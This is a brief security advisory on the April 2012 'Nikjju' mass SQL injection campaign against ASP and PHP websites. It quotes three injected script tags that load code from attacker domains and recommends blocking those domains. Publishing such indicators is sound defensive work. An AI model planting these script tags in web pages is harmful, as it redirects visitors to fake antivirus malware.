Cyberattacks April 2012 – Nikjju Mass SQL Injection Campaign
This attack is targeted on ASP, ASP.net and PHP websites. It was reported that visitors to the infected pages will be redirected to malicious sites hosting fake/rogue AVs.
The infected websites are injected with the following strings:
<script src= http://hgbyju.com/r.php></script>
<script src= http://nikjju.com/r.php></script>
<script src= http://hnjhkm.com/r.php></script>
Domains updated Date:
Strongly advised to block access to the suspicious sites (hgbyju.com, nikjju.com and hnjhkm.com) at their proxies to prevent end-users machine to be directed to an infected site.